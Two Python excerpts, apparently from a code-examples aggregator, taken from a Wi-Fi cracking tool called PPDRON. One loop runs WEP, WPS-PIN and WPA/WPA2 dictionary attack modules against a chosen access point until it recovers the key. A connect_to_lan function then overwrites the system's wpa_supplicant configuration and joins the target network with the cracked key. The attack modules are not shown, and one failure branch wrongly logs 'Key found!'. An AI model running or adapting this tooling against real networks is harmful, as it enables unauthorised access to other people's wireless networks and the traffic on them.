                    if settings.TARGET_KEY is not None:
                        info('Key found!: {k} '.format(k=settings.TARGET_KEY))
                        report.saveLog(
                            'Key found!: {k} '.format(k=settings.TARGET_KEY))
                        lan_mgr.save_key()
                        break
                else:
                    pass
            if settings.TARGET_KEY is None:
                error('Key not found! :-(')
                report.saveLog(
                    'Key found!: {k} '.format(k=settings.TARGET_KEY))
                generateReport()
                exit(0)

        elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2WPA' or settings.TARGET_PRIVACY == 'WPA2 WPA':
            info('Cracking {e} access point with {p} privacy...'.format(
                e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
            report.saveLog(
                'Cracking {e} access point with {p} privacy...'.format(
                    e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))

            wps = wash.wash_scan()

            if wps:
                info('WPS is enabled')
                report.saveLog('WPS is enabled')
                wps_modules = find_modules('wps')
                for wps_module in wps_modules:
                    attack = import_module(wps_module[0])
                    if attack.check():
                        attack.setup()
                        attack.run()
                        if settings.TARGET_KEY is not None:
                            report.TARGET_ATTACK = 'Ataque al WPS'
                            info('Key found!: {k} '.format(
                                k=settings.TARGET_KEY))
                            report.saveLog('Key found!: {k} '.format(
                                k=settings.TARGET_KEY))
                            break
                    else:
                        pass

            if settings.TARGET_KEY is None:
                if wps:
                    warn(
                        'PIN not found! :-( Running WPA/WPA2 attack modules...'
                    )
                    report.saveLog(
                        'PIN not found! :-( Running WPA/WPA2 attack modules...'
                    )
                wpa_modules = find_modules('wpa')
                for wpa_module in wpa_modules:
                    attack = import_module(wpa_module[0])
                    if attack.check():
                        attack.setup()
                        attack.run()
                        if settings.TARGET_KEY is not None:
                            info('Key found!: {k} '.format(
                                k=settings.TARGET_KEY))
                            report.saveLog('Key found!: {k} '.format(
                                k=settings.TARGET_KEY))
                            report.TARGET_ATTACK = 'Ataque de diccionario'
                            break
                    else:
                        pass

            if settings.TARGET_KEY is None:  # still...
                error('Key not found! :-(')
                report.saveLog('Key not found! :-(')
                generateReport()
                exit(0)
            else:
                lan_mgr.save_key()
        else:
            info('Open network!')
            report.saveLog('Open network!')
            report.TARGET_ATTACK = 'Ninguno'

    info('PPDRON has finished! Good bye! ;)')
    report.saveLog('PPDRON has finished! Good bye! ;)')
    generateReport()
Example #34
0
def connect_to_lan():
    import fcntl
    import struct
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    tries = 0

    if settings.INTERFACE_MON is not None:
        device_mgr.toggle_mode_monitor(False)
        time.sleep(1)

    def do_connect():
        nonlocal sock
        nonlocal tries
        info("Connecting to '{0}' with key '{1}'".format(
            settings.TARGET_ESSID,
            settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))

        cmd_connect = pexpect.spawn(
            'iwconfig {0} essid "{1}" key s:{2}'.format(
                settings.INTERFACE, settings.TARGET_ESSID,
                settings.TARGET_KEY))
        cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
        cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
        cmd_connect.close()
        parse_log_connect = open(settings.LOG_FILE, 'r')
        for line in parse_log_connect:
            if line.find('Error') != -1:
                wpa_supplicant = open(
                    '/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
                wpa_supplicant.write(
                    'ctrl_interface=/var/run/wpa_supplicant\n')
                wpa_supplicant.write('network={\n')
                wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
                wpa_supplicant.write('key_mgmt=WPA-PSK\n')
                wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
                                     '"\n')
                wpa_supplicant.write('}')
                wpa_supplicant.close()
                subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(['dhclient', settings.INTERFACE, '-r'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call(
                    ['iwconfig', settings.INTERFACE, 'mode', 'managed'])
                subprocess.call(['killall', 'wpa_supplicant'],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                subprocess.call([
                    'wpa_supplicant', '-B', '-c',
                    '/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
                    settings.INTERFACE
                ],
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
                time.sleep(2)
        parse_log_connect.close()
        os.remove(settings.LOG_FILE)
        tries += 1
        subprocess.call(['dhclient', settings.INTERFACE],
                        stdout=subprocess.DEVNULL,
                        stderr=subprocess.DEVNULL)
        time.sleep(4)

    do_connect()
    if get_current_essid() != settings.TARGET_ESSID and tries < 5:
        warn('Connection to {e} failed. Retrying.'.format(
            e=settings.TARGET_ESSID))
        do_connect()
    if get_current_essid() == settings.TARGET_ESSID:
        ipaddr = socket.inet_ntoa(
            fcntl.ioctl(
                sock.fileno(), 0x8915,
                struct.pack('256s', bytes(settings.INTERFACE[:15],
                                          'utf-8')))[20:24])
        info('Connection to {e} succeeded! Our IP is: {i}'.format(
            e=settings.TARGET_ESSID, i=ipaddr))
        settings.IP_LAN = ipaddr.strip()
    else:
        error('Could not connect to {e} after 5 tries. Aborting'.format(
            e=settings.TARGET_ESSID))
        exit(1)